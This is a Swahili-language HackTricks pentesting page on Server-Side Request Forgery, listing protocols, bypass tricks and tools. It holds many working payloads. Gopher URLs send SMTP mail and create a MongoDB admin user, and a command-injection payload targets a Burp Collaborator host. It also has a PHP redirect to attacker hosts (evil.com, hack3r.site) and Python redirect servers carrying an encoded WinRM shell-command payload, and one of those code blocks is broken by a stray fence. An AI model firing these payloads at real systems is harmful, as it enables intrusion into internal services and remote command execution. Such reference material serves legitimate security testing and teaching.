hacktricks/pentesting-web/ssrf-server-side-request-forgery/README.md

# SSRF (Server Side Request Forgery)

<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa kutumia zana za **jamii ya juu zaidi** duniani.\
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

## Taarifa Msingi

Ugunduzi wa **udhaifu wa Server-side Request Forgery (SSRF)** hutokea wakati muhusika anadanganya **programu upande wa seva** kufanya **ombi la HTTP** kwa kikoa wanachochagua. Udhaifu huu unafunua seva kwa maombi ya nje yasiyo na mpangilio yanayoongozwa na muhusika.

## Kukamata SSRF

Jambo la kwanza unalohitaji kufanya ni kukamata mwingiliano wa SSRF uliozalishwa na wewe. Kukamata mwingiliano wa HTTP au DNS unaweza kutumia zana kama:

* **Burp Collaborator**
* [**pingb**](http://pingb.in)
* [**canarytokens**](https://canarytokens.org/generate)
* [**interractsh**](https://github.com/projectdiscovery/interactsh)
* [**http://webhook.site**](http://webhook.site)
* [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff)
* [http://requestrepo.com/](http://requestrepo.com/)
* [https://github.com/stolenusername/cowitness](https://github.com/stolenusername/cowitness)
* [https://github.com/dwisiswant0/ngocok](https://github.com/dwisiswant0/ngocok) - Burp Collaborator inayotumia ngrok

## Kupitisha Domains Zilizowekwa kwenye Orodha

Kawaida utagundua kuwa SSRF inafanya kazi tu kwenye **vikoa au URL vilivyoorodheshwa kwenye orodha**. Kwenye ukurasa unaofuata una **mkusanyiko wa mbinu za kujaribu kupitisha orodha hiyo**:

{% content-ref url="url-format-bypass.md" %}
[url-format-bypass.md](url-format-bypass.md)
{% endcontent-ref %}

### Kupitisha kupitia kuelekeza wazi

Ikiwa seva imekingwa vizuri unaweza **kupitisha vizuizi vyote kwa kudukua Kuelekeza wazi kwenye ukurasa wa wavuti**. Kwa sababu ukurasa wa wavuti utaruhusu **SSRF kwa kikoa kile kile** na labda itafuata **kuelekeza**, unaweza kutumia **Kuelekeza wazi kufanya seva iweze kupata rasilimali yoyote ya ndani**.\
Soma zaidi hapa: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)

## Itifaki

* **file://**
* Itifaki ya URL `file://` inaelekezwa, ikionyesha moja kwa moja kwa `/etc/passwd`: `file:///etc/passwd`
* **dict://**
* Itifaki ya URL ya DICT inaelezwa kutumika kwa kupata ufafanuzi au orodha za maneno kupitia itifaki ya DICT. Mfano uliotolewa unaelezea URL iliyoundwa ikilenga neno, database, na nambari ya kuingia maalum, pamoja na mfano wa skripti ya PHP inayoweza kutumiwa vibaya kuunganisha kwenye seva ya DICT kwa kutumia maelezo ya muhusika: `dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>`
* **SFTP://**
* Inatambuliwa kama itifaki ya uhamishaji salama wa faili kupitia ganda la usalama, mfano unapatikana ukionyesha jinsi skripti ya PHP inaweza kutumiwa kudukua kuunganisha kwenye seva mbaya ya SFTP: `url=sftp://generic.com:11111/`
* **TFTP://**
* Itifaki ya Uhamishaji wa Faili wa Trivial, ikifanya kazi kupitia UDP, inatajwa na mfano wa skripti ya PHP iliyoundwa kutuma ombi kwa seva ya TFTP. Ombi la TFTP linatolewa kwa 'generic.com' kwenye bandari '12346' kwa faili 'TESTUDPPACKET': `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
* **LDAP://**
* Sehemu hii inashughulikia Itifaki ya Upatikanaji wa Dhibiti wa Mwongozo, ikisisitiza matumizi yake kwa kusimamia na kupata huduma za habari za saraka zilizosambazwa kupitia mitandao ya IP. Kuwasiliana na seva ya LDAP kwenye localhost: `'%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.`
* **SMTP**
* Njia inaelezewa ya kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, ikiwa ni pamoja na hatua za kufunua majina ya kikoa cha ndani na hatua zaidi za uchunguzi kulingana na habari hiyo.
```
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
```
* **Curl URL globbing - Kupitisha WAF**
* Ikiwa SSRF inatekelezwa na **curl**, curl ina kipengele kinachoitwa [**URL globbing**](https://everything.curl.dev/cmdline/globbing) ambacho kinaweza kuwa na manufaa katika kupitisha WAFs. Kwa mfano katika hii [**andika**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi) unaweza kupata mfano huu kwa **kuvuka njia kupitia itifaki ya `file`**:
```
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
```
* **Gopher://**
* Uwezo wa itifaki ya Gopher wa kutaja IP, bandari, na baite kwa mawasiliano ya seva unajadiliwa, pamoja na zana kama Gopherus na remote-method-guesser kwa kutengeneza mizigo. Matumizi mawili tofauti yanafafanuliwa:

### Gopher://

Kwa kutumia itifaki hii unaweza kutaja **IP, bandari na baite** unayotaka seva itume. Kisha, unaweza kimsingi kutumia udhaifu wa SSRF kuwasiliana na **seva yoyote ya TCP** (lakini unahitaji kujua jinsi ya kuzungumza na huduma kwanza).\
Bahati nzuri, unaweza kutumia [Gopherus](https://github.com/tarunkant/Gopherus) kutengeneza mizigo kwa huduma kadhaa. Kwa kuongezea, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) inaweza kutumika kutengeneza mizigo ya _gopher_ kwa huduma za _Java RMI_.

**Gopher smtp**
```
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT
```
**Gopher HTTP**
```bash
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
```
**Gopher SMTP - Rudi kwa 1337**

{% code title="redirect.php" %}
```php
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.
```
{% endcode %}

#### Gopher MongoDB -- Unda mtumiaji mwenye jina la mtumiaji=admin na nywila=admin123 na kibali=msimamizi
```bash
# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'
```
## SSRF kupitia kichwa cha Referrer & Wengine

Programu za takwimu kwenye seva mara nyingi hurekodi kichwa cha Referrer kufuatilia viungo vinavyoingia, mazoezi ambayo kwa bahati mbaya hufunua programu kwa vulnerabilities za Server-Side Request Forgery (SSRF). Hii ni kwa sababu programu kama hizo zinaweza kutembelea URL za nje zilizotajwa kwenye kichwa cha Referrer kuchambua maudhui ya tovuti ya rufaa. Ili kugundua vulnerabilities hizi, programu-jalizi ya Burp Suite "**Collaborator Everywhere**" inapendekezwa, ikichangamsha njia ambayo zana za takwimu zinavyoprocess kichwa cha Referer kutambua maeneo ya mashambulizi ya SSRF yanayowezekana.

## SSRF kupitia data ya SNI kutoka kwenye cheti

Hitilafu ambayo inaweza kuwezesha uhusiano kwa seva yoyote ya nyuma kupitia usanidi rahisi inaelezwa kwa mfano wa usanidi wa Nginx:
```
stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}
```
Katika usanidi huu, thamani kutoka kwenye uga wa Jina la Seva Indication (SNI) hutumiwa moja kwa moja kama anwani ya seva ya nyuma. Usanidi huu unafunua udhaifu wa Udukuzi wa Ombi la Seva-Upande (SSRF), ambao unaweza kutumiwa kwa kuelekeza tu anwani ya IP au jina la uwanja uliokusudiwa kwenye uga wa SNI. Mfano wa kutumia udhaifu huu kufanya uunganisho kwa seva ya nyuma isiyojulikana, kama vile `internal.host.com`, kwa kutumia amri ya `openssl` umeelezwa hapa chini:
```bash
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
```
## [Weka faili kupitia Wget](../file-upload/#wget-file-upload-ssrf-trick)

## SSRF na Kuingiza Amri

Inaweza kuwa na thamani kujaribu mzigo kama huu: `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` ``

## Utoaji wa PDFs

Ikiwa ukurasa wa wavuti unazalisha moja kwa moja PDF na habari fulani uliyoitoa, unaweza **kuweka JS ambayo itatekelezwa na mtengenezaji wa PDF** yenyewe (seva) wakati wa kuzalisha PDF na utaweza kutumia SSRF. [**Pata habari zaidi hapa**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**

## Kutoka SSRF hadi DoS

Unda vikao kadhaa na jaribu kupakua faili nzito ukichexploit SSRF kutoka kwa vikao.

## Vipengele vya PHP vya SSRF

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %}
[php-ssrf.md](../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md)
{% endcontent-ref %}

## SSRF Kuhamisha kwa Gopher

Kwa baadhi ya uchimbaji unaweza kuhitaji **kutuma jibu la kuhamisha** (labda kutumia itikio tofauti kama gopher). Hapa una nambari tofauti za python kujibu kwa kuhamisha:
```python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
```html
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20
```plaintext
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
```

```python
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za **jamii ya juu zaidi** duniani.\
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

## DNS Rebidding CORS/SOP bypass

Ikiwa una **matatizo** ya **kutoa maudhui kutoka kwa IP ya ndani** kwa sababu ya **CORS/SOP**, **DNS Rebidding** inaweza kutumika kuvuka kizuizi hicho:

{% content-ref url="../cors-bypass.md" %}
[cors-bypass.md](../cors-bypass.md)
{% endcontent-ref %}

### DNS Rebidding Otomatiki

[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) ni zana ya kufanya mashambulizi ya [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding). Inajumuisha vipengele muhimu vya kurekebisha anwani ya IP ya seva ya shambulizi kwa jina la DNS la lengo na kutumikia mizigo ya shambulizi kudukua programu zinazoweza kudhurika kwenye mashine ya lengo.

Tazama pia **seva inayofanya kazi hadharani** katika [**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)

## DNS Rebidding + Kitambulisho cha Kikao cha TLS/Tiketi ya Kikao

Mahitaji:

* **SSRF**
* **Vikao vya TLS vya kutoka nje**
* **Vitu kwenye bandari za ndani**

Shambulio:

1. Muulize mtumiaji/roboti **upate** **kikoa** kinachodhibitiwa na **mshambulizi**
2. **TTL** ya **DNS** ni **0** sec (hivyo muathiriwa atachunguza IP ya kikoa tena hivi karibuni)
3. Uunganisho wa **TLS** unajengwa kati ya muathiriwa na kikoa cha mshambulizi. Mshambulizi anaingiza **mzigo ndani** ya **Kitambulisho cha Kikao au Tiketi ya Kikao**.
4. **Kikoa** kitanzisha **mzunguko usio na mwisho** wa kuelekeza dhidi yake **mwenyewe**. Lengo la hii ni kufanya mtumiaji/roboti kupata upatikanaji wa kikoa hadi itekeleze **tena** ombi la **DNS** la kikoa.
5. Katika ombi la DNS anwani ya **IP ya kibinafsi** inatolewa **sasa** (kwa mfano 127.0.0.1)
6. Mtumiaji/roboti atajaribu **kurejesha uhusiano wa TLS** na ili kufanya hivyo itatuma Kitambulisho cha **Kikao/Tiketi ya Kikao** (ambapo **mzigo** wa mshambulizi ulikuwa umefichwa). Hivyo pongezi umefanikiwa kuomba **mtumiaji/roboti ajidhuru mwenyewe**.

Tambua kuwa wakati wa shambulio hili, ikiwa unataka kushambulia localhost:11211 (_memcache_) unahitaji kufanya muathiriwa kuanzisha uhusiano wa awali na www.attacker.com:11211 (bandari ** lazima iwe sawa **).\
Kwa **kutekeleza shambulio hili unaweza kutumia zana**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
Kwa **maelezo zaidi** tazama mazungumzo ambapo shambulio hili linaelezewa: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference)

## Blind SSRF

Tofauti kati ya SSRF isiyo na maono na ile isiyo na maono ni kwamba katika ile isiyo na maono huwezi kuona majibu ya ombi la SSRF. Kwa hivyo, ni ngumu zaidi kudukua kwa sababu utaweza kudukua tu mapungufu yanayojulikana vizuri.

### Wakati wa msingi wa SSRF

**Kwa kuchunguza wakati** wa majibu kutoka kwa seva inaweza kuwa **inawezekana kujua ikiwa rasilimali ipo au la** (labda inachukua muda zaidi kupata rasilimali inayopo kuliko kupata ile ambayo haipo)

## Udukuzi wa Cloud SSRF

Ikiwa unapata udhaifu wa SSRF kwenye mashine inayotumika ndani ya mazingira ya wingu unaweza kupata habari muhimu kuhusu mazingira ya wingu na hata vibali:

{% content-ref url="cloud-ssrf.md" %}
[cloud-ssrf.md](cloud-ssrf.md)
{% endcontent-ref %}

## Majukwaa Yenye Udhaifu wa SSRF

Majukwaa kadhaa yaliyofahamika yana au yamekuwa na udhaifu wa SSRF, angalia katika:

{% content-ref url="ssrf-vulnerable-platforms.md" %}
[ssrf-vulnerable-platforms.md](ssrf-vulnerable-platforms.md)
{% endcontent-ref %}

## Zana

### [**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)

Zana ya kugundua na kudukua udhaifu wa SSRF

### [Gopherus](https://github.com/tarunkant/Gopherus)

* [Machapisho ya blogu kuhusu Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)

Zana hii inazalisha mizigo ya Gopher kwa:

* MySQL
* PostgreSQL
* FastCGI
* Redis
* Zabbix
* Memcache

### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)

* [Machapisho ya blogu kuhusu matumizi ya SSRF](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)

_remote-method-guesser_ ni skana ya udhaifu wa _Java RMI_ inayounga mkono operesheni za mashambulizi kwa udhaifu wa kawaida wa _Java RMI_. Operesheni nyingi zinazopatikana zinaunga mkono chaguo la `--ssrf`, kuzalisha mzigo wa _SSRF_ kwa operesheni iliyoombwa. Pamoja na chaguo la `--gopher`, mizigo ya _gopher_ tayari inaweza kuzalishwa moja kwa moja.

### [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)

SSRF Proxy ni seva ya HTTP yenye nyuzi nyingi iliyoundwa kuficha trafiki ya HTTP ya mteja kupitia seva za HTTP zinazoweza kudukuliwa kwa Server-Side Request Forgery (SSRF).

### Kwa mazoezi

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}

## Marejeo

* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
* [https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/](https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/)

<details>

<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za **jamii ya juu zaidi** duniani.\
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}